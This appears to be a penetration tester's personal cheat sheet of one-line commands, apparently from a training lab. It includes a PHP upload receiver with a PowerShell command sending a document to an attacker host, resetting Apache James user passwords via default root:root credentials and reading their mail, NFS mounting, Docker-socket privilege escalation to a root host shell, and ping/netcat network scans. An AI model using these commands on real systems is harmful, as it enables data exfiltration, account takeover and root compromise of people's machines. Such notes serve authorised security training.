Random Bits

stop output of errors in cmd

COMMAND 2> /dev/null

web servers

# php
php -S 0.0.0.0:8000
# ruby
ruby -run -e httpd . -p 9000
# busybox
busybox httpd -f -p 10000

SSH

Rev shell

ssh.exe -R 48172 -N

Output to null

Ssh -o "UserKnownHostsFile=/dev/null" -N -o "StrictHostKeyChecking no" -i "c:/Software/key"

ssh -oKexAlgorithms=XXX -oHostKeyAlgorithms=XXX

File upload

Apache

On kali – put inside /var/www/html/, create a uploads folder and chown it to www-data, then start apache:

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

On windows :

powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

Apache James

Change password to users using root:root against port 4555, then check mailboxes for info. Can use the following:

Listusers
Setpassword mailadmin 1234
for user in mailadmin marcus jenny joe45 ryuu john; do (echo USER $user; sleep 1s; echo PASS 1234; sleep 1s; echo LIST; sleep 1s; echo QUIT)| nc -nvC 10.11.1.72 110; done

Pop3

USER username
PASS password
LIST
RETR 1

NFS

Enumerations:

Showmout -e 10.11.1.72

Mount:

Mount -t nfs -o vers=2 -o nolock 10.11.1.72:/home /nfs

** if unreadable file – change owndership to the value of the file 😉 ***

Docker

useful commands:

docker ps #show installed dockers
docker container exec -it CONTAINER_ID /bin/bash #interactive shell on docker
docker images #show all installed dockers

socket write privesc:

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

one line scanners

Ping:

Windows:

for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.

Linux:

for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done

Netcat

TCP:

nc -nvv -w 1 -z 10.11.1.220 3388-3390

UDP:

nc -nv -u -z -w 1 10.11.1.115 160-162